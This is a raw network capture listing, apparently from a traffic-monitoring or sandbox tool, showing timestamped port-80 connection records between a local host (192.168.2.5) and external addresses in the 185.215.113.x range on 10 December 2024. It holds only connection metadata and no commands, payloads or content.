Dec 10, 2024 11:11:44.003751040 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.071497917 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.071561098 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.071599007 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.071640015 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.073851109 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.073961973 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.073965073 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.075200081 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.077642918 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.083306074 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.095350981 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.095443010 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.097012043 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.097125053 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.097275972 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.099956036 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.100585938 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.100707054 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.103945971 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.103971958 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.104020119 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.105807066 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.107510090 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.107587099 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.110698938 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.110734940 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.110848904 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.111737013 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.114002943 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.114062071 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.114614010 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.117177010 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.117217064 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.119745970 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.120481968 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.120565891 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.120590925 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.122989893 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.123855114 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.123939991 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.125185966 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.127118111 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.127196074 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.129137039 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.129221916 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.129252911 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.131051064 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.131191015 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.131300926 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.131740093 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.133205891 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.133326054 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.133339882 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.134685993 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.135221958 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.135334015 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.136605978 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.137295008 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.137418032 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.139456987 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.139591932 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.139633894 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.141411066 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.141426086 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.141441107 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.141468048 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.142967939 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.143471956 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.143601894 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.145548105 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.145586014 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.145675898 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.145817041 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.147556067 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.147634029 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.149650097 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.149678946 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.149687052 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.151665926 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.151715040 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.151849031 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.151920080 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.153703928 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.153800011 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.153840065 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.155863047 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.155905962 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.155982971 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.157893896 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.157924891 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.157958984 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.159828901 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.159969091 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.159991980 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.162096977 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.162137985 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.162148952 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.163242102 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.164056063 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.164155006 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.166059017 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.166130066 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.166518927 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.166551113 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.166712046 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.168067932 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.170747995 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.263453960 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.263484955 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.263583899 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.264065981 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.264137983 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.264233112 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.266047955 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.266129017 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.266165972 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.266233921 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.268135071 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.268191099 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.268301964 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.268341064 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.270273924 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.270334005 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.270338058 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.270431042 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.272135973 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.272345066 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.287344933 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.287532091 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.287589073 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.288208961 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.288362026 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.288499117 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.288557053 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.288650990 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.288698912 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.290292025 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.290353060 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.290426016 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.290466070 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.292196035 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.292289972 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.292363882 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.293839931 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.293886900 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.293989897 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.294102907 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.295636892 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.295692921 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.295747042 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.295886040 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.297420025 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.297478914 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.297631025 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.297682047 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.299242973 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.299331903 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.299356937 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.299412012 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.300981045 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.301074028 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.301120043 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.302684069 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.302752018 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.302802086 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.304465055 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.304599047 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.304668903 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.306260109 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.306371927 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.306447983 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.308108091 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.308470011 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.308542967 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.309881926 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.310005903 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.310059071 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.311625957 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.311753035 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.311856031 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.313430071 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.313569069 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.313644886 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.315130949 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.315258980 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.315308094 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.316910028 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.316982985 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.317048073 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.318675995 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.318794012 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.318844080 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.320553064 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.320593119 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.320609093 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.320632935 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.322175026 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.322242022 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.322290897 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.322366953 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.324023962 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.324083090 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.324112892 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.324160099 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.325846910 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.325932026 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.325952053 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.327337980 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.327583075 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.327716112 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.327857971 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.329304934 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.329386950 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.329422951 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.330240965 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.331110954 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.331326008 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.331427097 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.332845926 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.332906008 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.332921028 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.333638906 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.334605932 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.334638119 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.334687948 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.336352110 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.336477041 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.336497068 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.337136030 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.338223934 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.338304043 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.338325977 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.338361025 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.339988947 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.340092897 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.340140104 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.341753960 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.341833115 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.341888905 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.343452930 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.343512058 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.343555927 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.343739033 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.345267057 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.345316887 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.345328093 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.345654964 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.347012997 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.347069025 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.347162008 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.347240925 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.348742962 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.348855019 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.348858118 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.348939896 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.350578070 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.350608110 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.350646019 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.350667000 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.352324009 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.352389097 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.352406025 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.352469921 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.354136944 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.354192972 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.354231119 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.354271889 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.355869055 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.355915070 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.355921030 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.355971098 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.357619047 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.357669115 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.357744932 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.357791901 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.359404087 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.359477043 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.359530926 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.361176968 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.361299038 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.361361980 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.362896919 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.362946033 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.363050938 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.363094091 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.364698887 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.364772081 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.364844084 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.365973949 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.366451979 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.366570950 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.366579056 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.366622925 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.368206024 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.368339062 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.368402004 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.370002985 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.370058060 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.370130062 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.370228052 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.371774912 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.371850014 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.371865034 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.371932983 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.383544922 CET	49920	80	192.168.2.5	185.215.113.206
Dec 10, 2024 11:11:44.455729961 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.455796957 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.455939054 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.456561089 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.456640959 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.456675053 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.457084894 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.458256006 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.458296061 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.458344936 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.459944963 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.460011959 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.479676008 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.479732037 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.479815960 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.479907990 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.480247974 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.480334997 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.480401039 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.480544090 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.481287956 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.481415033 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.481441021 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.481460094 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.482672930 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.482714891 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.482753038 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.482786894 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.484090090 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.484189987 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.484245062 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.485460043 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.485522985 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.485610008 CET	80	49937	185.215.113.16	192.168.2.5
